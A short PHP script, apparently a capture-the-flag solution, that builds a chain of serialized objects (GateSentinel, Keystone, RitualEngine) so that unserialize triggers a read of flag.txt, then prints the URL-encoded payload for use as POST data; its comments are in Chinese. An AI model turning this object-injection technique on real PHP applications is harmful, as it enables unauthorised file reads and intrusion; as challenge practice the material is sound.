<?php class RitualEngine { protected $settings; public $target; public $callback; } class Keystone { public $center; } class GateSentinel { public $object; public $tool; } // 1. 最内层 RitualEngine D:负责最终读取flag.txt $D = new RitualEngine(); $D->target = 'flag.txt'; $D->callback = null; // 用不到 // 2. RitualEngine C:callback序列化保存 [D, 'view'] $C = new RitualEngine(); $C->callback = serialize([$D, 'view']); // 3. Keystone K:center指向C $K = new Keystone(); $K->center = $C; // 4. GateSentinel B:object随意,tool['blade']指向K $B = new GateSentinel(); $B->object = 'nothing'; // 不含flag, .. , etc $B->tool = ['blade' => $K]; // 5. 最外层 GateSentinel A:object指向B,触发__wakeup $A = new GateSentinel(); $A->object = $B; // 生成payload $payload = serialize($A); echo urlencode($payload); // 输出后可用作POST data参数 ?>
You have javascript disabled. You will not be able to edit any code.